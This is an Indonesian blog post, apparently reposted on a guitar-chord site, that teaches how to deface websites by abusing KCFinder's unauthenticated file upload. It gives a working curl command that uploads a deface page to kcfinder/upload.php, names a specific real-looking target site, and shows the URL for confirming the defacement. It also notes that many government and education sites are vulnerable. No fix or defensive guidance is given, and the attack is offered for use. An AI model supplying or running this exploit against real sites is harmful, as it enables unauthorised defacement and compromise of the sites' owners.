. KCFinder Upload Script Deface di Terminal dengan cURL - Kumpulan Kunci Gitar Lagu Terbaru

Featured Post

Chord Gitar Ajari Aku Mencintaimu - Jamrud Terbaru

Ajari Aku Mencintaimu - Jamrud Intro:  D D Bukan ku tak mau C#m        F#m   Bm       B Mengucap sgala kelebihanmu            Em Bukanya ak...

Home Deface New Plugins Terminal Tutorial Deface KCFinder Upload Script Deface di Terminal dengan cURL

KCFinder Upload Script Deface di Terminal dengan cURL

Ditulis oleh Tambah Komentar

KCFinder Upload Script Deface di Terminal dengan cURL - Selamat Datang sahabat Kumpulan Kunci Gitar Lagu Terbaru, Pada Artikel yang anda baca kali ini dengan judul KCFinder Upload Script Deface di Terminal dengan cURL, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. Mudah-mudahan isi postingan Artikel Deface, Artikel New, Artikel Plugins, Artikel Terminal, Artikel Tutorial Deface, yang kami tulis ini ada manfaatnya. Baiklah, selamat membaca.

Judul : KCFinder Upload Script Deface di Terminal dengan cURL
Link : KCFinder Upload Script Deface di Terminal dengan cURL

Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.



  • Apa itu Kcfinder?
     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.


  • Apa itu cURL?
    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :
  • Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
  • Terminal / CMD 
Tested :
  • MAC OS X Yosemite
Step :
  1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
  2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
  3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.



Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
logo
Jangan Lupa Tinggalkan Jejak.
  • Facebook
  • WhatsApp
  • Instagram

    • Subscribe Our Newsletter

    Related Posts

    Buka Komentar
    Tutup Komentar

    Belum ada Komentar untuk "KCFinder Upload Script Deface di Terminal dengan cURL"

    Posting Komentar

    Langganan: Posting Komentar (Atom)

    Iklan Atas Artikel

    Your ads2

    Iklan Tengah Artikel 1

    IKLAN A

    Iklan Tengah Artikel 2

    IKLAN B

    Iklan Bawah Artikel

    IKLAN C